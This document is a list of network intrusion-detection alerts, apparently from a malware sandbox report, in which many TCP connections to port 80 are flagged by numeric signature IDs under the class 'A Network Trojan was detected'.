                          Timestamp:04/06/24-09:31:13.897343
                          SID:2024318
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:37.305241
                          SID:2025381
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:00.493399
                          SID:2024313
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:04.359604
                          SID:2825766
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:01.279270
                          SID:2024313
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.206380
                          SID:2025381
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:37.260471
                          SID:2024313
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.203747
                          SID:2825766
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:11.610579
                          SID:2024318
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.081982
                          SID:2021641
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:01.546959
                          SID:2025381
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:37.260471
                          SID:2024318
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.920859
                          SID:2021641
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:57.593507
                          SID:2024313
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:30.251229
                          SID:2025381
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:11.610579
                          SID:2024313
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:17.815577
                          SID:2021641
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.814837
                          SID:2024318
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:57.593507
                          SID:2024318
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:01.279270
                          SID:2024318
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:33.293191
                          SID:2021641
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:46.581121
                          SID:2024313
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.112021
                          SID:2825766
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:22.504191
                          SID:2025381
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:00.769505
                          SID:2825766
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:33.293191
                          SID:2825766
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:35.733011
                          SID:2024313
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:46.592042
                          SID:2825766
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:28.699735
                          SID:2024313
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:19.370644
                          SID:2025381
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:28.699735
                          SID:2024318
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:03.603579
                          SID:2825766
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:23.301208
                          SID:2024313
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.907030
                          SID:2021641
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:13.652600
                          SID:2021641
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.970310
                          SID:2021641
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:35.733011
                          SID:2024318
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:21.669304
                          SID:2025381
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:10.531874
                          SID:2021641
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:23.301208
                          SID:2024318
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:56.772335
                          SID:2021641
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:40.344957
                          SID:2825766
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.861151
                          SID:2025381
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.961991
                          SID:2025381
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:56.772335
                          SID:2825766
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.975531
                          SID:2025381
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.801533
                          SID:2024313
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.136720
                          SID:2024313
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.119856
                          SID:2825766
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:08.547895
                          SID:2025381
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.136720
                          SID:2024318
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:39.580792
                          SID:2024313
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.920859
                          SID:2825766
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:29.470677
                          SID:2021641
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:39.580792
                          SID:2024318
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.862546
                          SID:2025381
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.921065
                          SID:2021641
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.907019
                          SID:2021641
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.801533
                          SID:2024318
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:05.441892
                          SID:2021641
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.081982
                          SID:2825766
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:52.706701
                          SID:2825766
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:42.690473
                          SID:2024318
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.998033
                          SID:2021641
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.970310
                          SID:2025381
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:43.454363
                          SID:2025381
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:57.593507
                          SID:2825766
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.812911
                          SID:2021641
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:42.690473
                          SID:2024313
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:06.739588
                          SID:2025381
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:15.463121
                          SID:2024318
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.203747
                          SID:2024318
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:24.825007
                          SID:2024318
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:15.463121
                          SID:2024313
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:06.739588
                          SID:2825766
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:33.437852
                          SID:2025381
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.846749
                          SID:2021641
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:37.260471
                          SID:2825766
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.203747
                          SID:2024313
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.081982
                          SID:2024313
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:25.556361
                          SID:2025381
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.181654
                          SID:2021641
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:43.454363
                          SID:2825766
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:07.768549
                          SID:2021641
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.920859
                          SID:2024318
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:41.966393
                          SID:2025381
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:49.735329
                          SID:2825766
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.081982
                          SID:2024318
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.865138
                          SID:2024313
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.220105
                          SID:2025381
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.865138
                          SID:2024318
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.920859
                          SID:2024313
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.891670
                          SID:2024318
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.891670
                          SID:2024313
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:08.547895
                          SID:2024313
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:46.581121
                          SID:2021641
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:33.293191
                          SID:2024313
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:35.733011
                          SID:2825766
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:33.293191
                          SID:2024318
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:44.269499
                          SID:2021641
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:29.470677
                          SID:2025381
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.975531
                          SID:2024318
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.921065
                          SID:2025381
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:08.547895
                          SID:2024318
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.035047
                          SID:2025381
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.079276
                          SID:2825766
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.975531
                          SID:2024313
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:39.580792
                          SID:2025381
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.891737
                          SID:2021641
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:39.686953
                          SID:2025381
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.194950
                          SID:2024313
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:30.339047
                          SID:2021641
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.194950
                          SID:2024318
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:13.652600
                          SID:2024313
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:25.556361
                          SID:2825766
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:28.699735
                          SID:2021641
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:42.736556
                          SID:2024313
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:18.590588
                          SID:2021641
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:09.757970
                          SID:2825766
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.972978
                          SID:2024318
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.204192
                          SID:2025381
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:17.815577
                          SID:2825766
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.972978
                          SID:2024313
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:42.736556
                          SID:2024318
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:53.641650
                          SID:2825766
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:26.328739
                          SID:2021641
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:54.422589
                          SID:2021641
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:36.488685
                          SID:2025381
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.042075
                          SID:2024318
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.814837
                          SID:2025381
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.124910
                          SID:2025381
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.042075
                          SID:2024313
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.862546
                          SID:2825766
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:04.659572
                          SID:2025381
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:41.966393
                          SID:2825766
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.096160
                          SID:2021641
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:54.259588
                          SID:2024318
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.801533
                          SID:2021641
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.891260
                          SID:2025381
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.112021
                          SID:2021641
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.136720
                          SID:2021641
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:32.673178
                          SID:2021641
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.897343
                          SID:2024313
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.839758
                          SID:2024317
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.999341
                          SID:2825766
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:54.259588
                          SID:2024313
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:56.595283
                          SID:2025381
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:35.705322
                          SID:2025381
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:43.503603
                          SID:2825766
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.839758
                          SID:2024312
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:44.242163
                          SID:2024318
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.895022
                          SID:2024318
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.018070
                          SID:2825766
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:51.314444
                          SID:2024313
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:44.242163
                          SID:2024313
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:13.652600
                          SID:2024318
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.860100
                          SID:2021641
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:14.423119
                          SID:2825766
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:51.314444
                          SID:2024318
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.115114
                          SID:2825766
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.895022
                          SID:2024313
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:14.663983
                          SID:2021641
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:23.301208
                          SID:2025381
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:40.344957
                          SID:2024318
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:40.344957
                          SID:2024313
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:56.772335
                          SID:2025381
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:01.546959
                          SID:2825766
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:09.316933
                          SID:2021641
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:18.674487
                          SID:2025381
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:07.768549
                          SID:2025381
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.137227
                          SID:2025381
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:26.424765
                          SID:2025381
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:29.547586
                          SID:2024318
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.801533
                          SID:2825766
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.128553
                          SID:2021641
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.961991
                          SID:2021641
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:10.531874
                          SID:2025381
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:29.547586
                          SID:2024313
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:19.370644
                          SID:2024318
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.907030
                          SID:2025381
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.117986
                          SID:2021641
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:08.980641
                          SID:2024318
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.861151
                          SID:2021641
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:19.370644
                          SID:2024313
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.133120
                          SID:2025381
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
